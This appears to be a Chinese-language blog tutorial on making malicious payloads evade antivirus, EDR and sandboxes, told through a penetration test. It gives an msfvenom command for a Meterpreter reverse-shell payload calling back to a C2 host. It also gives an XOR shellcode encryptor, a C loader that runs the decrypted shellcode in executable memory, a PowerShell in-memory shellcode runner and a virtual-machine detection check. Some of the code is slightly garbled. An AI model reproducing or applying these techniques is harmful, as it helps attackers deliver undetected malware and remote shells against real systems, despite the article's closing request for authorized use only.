一、从一则APT攻击新闻说起
2023年初,一则关于某跨国企业遭遇APT攻击的新闻引起了我的注意。攻击者通过一个高度定制化的恶意载荷成功绕过了企业的高级威胁检测系统,并在其内网中横行数月,最终窃取了大量敏感数据。事件公开后,安全圈迅速对此展开了分析。溯源显示,攻击者使用了多种免杀技术,从恶意样本的混淆与加壳,到动态内存加载,甚至包括定制C2协议。这些手段使得载荷在执行过程中能有效逃避EDR和沙盒分析。
这让我联想到一次内部的渗透测试项目。面对甲方部署的多层防御体系,我也不得不深入研究如何打造“隐形”的恶意载荷。今天,我将结合那次测试经验,分享几种实战中效果显著的免杀技巧。
---
二、恶意载荷免杀的基本原理
在渗透测试中,恶意载荷的免杀本质上是对抗安全检测机制。无论是静态特征检测(如基于特征码的查杀),还是动态行为检测(如基于行为分析的EDR),其核心都在于判断是否存在异常的代码或运行行为。
常见检测机制分析
- 静态检测:依赖文件特征,例如硬编码的Shellcode、可疑字符串、已知恶意函数调用等。
- 动态检测:监控进程行为,包括内存分配、网络通信、文件操作等。
- 沙盒分析:通过虚拟化技术执行样本,观察其运行行为。
要实现高效免杀,需要针对这些检测机制设计对抗策略。
免杀的核心思路
- 避免静态特征匹配:通过混淆、加密等手段改变样本外观。
- 规避动态分析:绕过行为监控,例如通过内存加载避免直接调用敏感API。
- 逃避沙盒环境:检测虚拟机特征,延时加载核心功能。
接下来,我将以实战为导向,逐步讲解如何实现这些免杀技术。
---
三、环境搭建:从对抗EDR开始
实战测试环境的搭建至关重要。在那次渗透测试中,我在实验室内复现了甲方关键的安全监控机制,包括:
- 某主流杀毒软件(如Defender、Kaspersky)。
- 一款企业级EDR(Endpoint Detection and Response)。
- 基于Windows域的内网模拟环境。
环境配置
- 受害机系统:Windows 10 x64,安装主流杀毒软件和EDR。
- 测试服务器:Kali Linux,用于C2控制。
- 工具链:Cobalt Strike、Metasploit,以及自编译的恶意载荷。
在部署完这些工具后,我选择了一个最基础的载荷作为起点——一个简单的Windows reverse shell。首先,我们在Kali上生成一个Metasploit的Payload:
<pre><code class="language-bash">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe</code></pre>
直接将这个文件投递到目标机上时,毫无意外地被EDR拦截了。下一步,就是逐步对其进行免杀处理。
---
四、实战免杀:从混淆到内存加载
(1)混淆:让特征码失效
最简单的免杀方式是通过混淆改变恶意载荷的文件特征。
自定义Shellcode加密解密
我们可以将原始Shellcode进行加密处理,运行时解密加载到内存中。下面是一个Python脚本,将生成的Shellcode进行简单的XOR加密:
<pre><code class="language-python"># 加密Shellcode的Python脚本 def xor_encrypt(shellcode, key): encrypted = bytearray() for byte in shellcode: encrypted.append(byte ^ key) return encrypted
读取Shellcode
original_shellcode = b"\xfc\xe8\x82\x00\x00\x00\x60\x89..." key = 0x55 # 自定义加密密钥 encrypted_shellcode = xor_encrypt(original_shellcode, key)
输出加密后的Shellcode
with open("enc_shellcode.bin", "wb") as f: f.write(encrypted_shellcode)</code></pre>
运行上述脚本后,生成一个加密后的Shellcode文件。然后在目标机上,使用下面的C代码加载并执行解密后的Shellcode:
<pre><code class="language-c">#include <windows.h>
void xor_decrypt(unsigned char* data, size_t length, unsigned char key) { for (size_t i = 0; i < length; i++) { data[i] ^= key; } }
int main() { unsigned char encrypted_shellcode[] = { / 加密后的Shellcode / }; size_t len = sizeof(encrypted_shellcode); unsigned char key = 0x55;
// 解密 xor_decrypt(encrypted_shellcode, len, key);
// 执行解密后的Shellcode void exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(exec_mem, encrypted_shellcode, len); ((void()())exec_mem)();
return 0; }</code></pre>
通过这种方式,直接绕过了基于特征的静态检测。
---
(2)内存加载:避开文件扫描
除了改变文件特征,我们还可以通过内存加载的方式完全避免文件落地。经典的手法是使用PowerShell的Invoke-ReflectivePEInjection,将恶意代码直接加载到目标进程中。
以下是一个简单的内存加载脚本:
<pre><code class="language-powershell"># PowerShell脚本:通过内存加载执行Shellcode $shellcode = byte[] $size = $shellcode.Length
分配内存
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($size) [System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $mem, $size)
修改内存权限为可执行
Add-Type -TypeDefinition @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } "@ $oldProtect = 0 [Win32]::VirtualProtect($mem, [uint32]$size, 0x40, [ref]$oldProtect)
执行Shellcode
$delegate = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mem, [Action].MakeGenericType()) $delegate.Invoke()</code></pre>
将上述脚本在受害机上运行,EDR无法检测到任何恶意文件。
---
五、逃避沙盒:对抗分析环境
为了规避沙盒分析,可以在载荷中加入环境检测机制。以下是一个简单的虚拟机检测代码,用于判断当前环境是否为沙盒:
<pre><code class="language-python">import os
def is_vm():
检查是否存在虚拟化相关进程
vm_processes = ["vmware", "vbox", "qemu"] for proc in vm_processes: if proc in os.popen('tasklist').read().lower(): return True return False
if is_vm(): print("Detected VM environment. Exiting...") exit() else: print("No VM detected. Proceeding...")</code></pre>
如果检测到虚拟机环境,程序会直接退出,避免被沙盒捕获。
---
六、个人经验:免杀是一门艺术
在那次测试后,我深刻意识到,免杀不仅仅是技术上的对抗,更是一种对系统和检测机制的深度理解。以下是我的几点心得:
- 不要迷信工具:市面上的免杀工具很多,但效果因环境而异,最可靠的方法是根据目标定制免杀方案。
- 多环境测试:在多种安全产品上测试载荷的表现,才能发现潜在问题。
- 持续学习:EDR厂商不断更新检测规则,免杀技术也需要快速迭代。
这篇文章里分享的技术仅用于授权测试,请大家合法使用,切勿滥用。希望本文能为大家提供一些实战中的启发!
